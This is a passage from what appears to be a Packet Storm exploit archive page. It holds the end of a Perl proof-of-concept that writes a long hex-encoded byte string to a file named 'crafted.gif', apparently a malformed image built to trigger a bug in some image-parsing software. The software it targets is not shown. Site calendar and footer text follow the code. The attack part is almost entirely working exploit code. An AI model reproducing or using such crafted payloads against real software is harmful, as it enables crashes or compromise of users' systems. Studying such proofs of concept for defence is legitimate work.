"\xBD\x6F\x70\x30\x20\x4B\x0E\x56\xC0\x80\x62\x84\x74\x17\x99\xEB".
"\x86\x32\xF2\x41\xD4\x7B\x10\xA0\x1B\xA5\x80\xC6\x24\x8E\x31\x09".
"\x77\xB0\xE0\x07\x5C\x2B\xD2\x0D\x5F\x92\xC5\x11\x64\xE0\x05\xEE".
"\xE8\x84\x25\xF6\xF5\x0D\x02\x78\x35\x1F\xE9\x08\x40\x3A\xBA\x11".
"\xD6\x60\x50\x82\x12\xF3\x30\x88\x16\xB4\x10\x00\x2D\xF8\x12\x45".
"\x8B\x11\x4B\x0F\x56\xF0\xD1\x64\x58\x22\x8E\xCC\x08\xC6\x40\x00".
"\xB0\x57\x82\x00\xE0\xAF\x80\x15\x08\x5F\xDB\x8A\xBC\x96\xAC\xEF".
"\x01\x2D\xA0\x02\x0C\x86\x40\x00\x54\x4C\xA2\x13\x22\x0D\x00\x60".
"\x27\x3B\x59\xC9\x4A\x96\xAF\x98\x0D\x6C\x61\x05\xE0\x83\x1F\x0C".
"\x01\x09\x02\x38\x00\x18\x0C\xF0\x0A\x50\xAC\xD1\x17\x7A\x15\xAC".
"\x6A\xFD\x7A\x59\xCB\x0E\x76\xB0\xFF\x24\x0C\x0C\xAC\x40\x05\x2A".
"\xFF\x48\x00\x01\x6C\x90\x03\x25\x48\x01\x0D\x6B\xA0\x76\xB5\x94".
"\x15\x6C\x70\xFF\x6A\xD9\xE2\x08\x40\x08\x3B\x18\xC1\x07\x12\xA0".
"\x01\x26\x9C\x20\x0F\x77\xB8\xC6\x23\x38\x06\x0C\xD7\x16\xD7\xB2".
"\x7D\x70\x2D\x66\xB5\x7B\x10\xD4\x70\x36\x07\x31\x10\x81\x13\xC6".
"\x50\x07\x3E\xE8\xC1\x0E\xA4\xA8\x06\x2F\x4A\x11\x56\xE2\x5A\xB7".
"\x0F\x85\xE0\xEE\x76\x05\xC2\xD6\x82\xB0\xC4\x07\x35\x98\x80\x06".
"\x96\xE0\x04\x07\xE4\x08\x0E\x78\x38\xC4\x20\xEC\x90\x8A\x58\x74".
"\x82\x17\xED\xED\x2B\x6C\x29\x9B\x59\xF7\x16\x04\x08\x24\xB8\x00".
"\x0D\x98\x10\x05\x29\xA4\xC0\x0D\x74\xD8\x07\x1D\xF0\x00\x08\x01".
"\xDB\xC1\x00\xA8\xD0\x2B\x71\x19\xBC\xDD\x11\xB3\xD6\x20\x0A\x68".
"\x6E\x85\xEB\x91\x86\x16\xBB\x01\x0E\xE5\x3D\x04\x20\x04\x01\x08".
"\x3B\xC8\xC2\xBA\xC5\x5D\x70\x6B\x19\x7C\x10\x27\x40\x41\x0A\xF2".
"\xE8\x54\x19\xF8\xD1\x62\x18\xFF\x81\xC6\x87\x30\x84\x21\xF6\xE0".
"\x07\xD5\x66\x77\xBB\x80\x90\xEF\x89\x0B\x32\x86\x32\xD0\xA1\x0C".
"\x69\xE0\x87\x96\xF9\xF1\xE2\x3A\x04\x82\xC6\x1D\x2E\x44\x21\xF6".
"\x20\x07\xCB\x16\xE2\xC9\x7C\xC5\x83\x75\xDD\x4B\x5C\x7F\x18\x24".
"\x33\xCB\x2D\x1E\xF2\x96\x5F\x1C\x09\x44\x0C\x02\x10\x33\x16\x73".
"\x21\xFE\xD0\x64\x42\x14\xE2\x10\xD9\x0D\x00\x21\xFE\xE0\xE6\x42".
"\x0B\xC4\x1F\x6E\x0E\x80\x3F\xCA\xE0\x90\x46\x3B\xFA\xD1\x90\x8E".
"\x34\x41\x02\x02\x00\x3B";

open(C, ">:raw", "crafted.gif");
print C $crafted;
close(C);

# http://0xffe4.org

Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    0 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close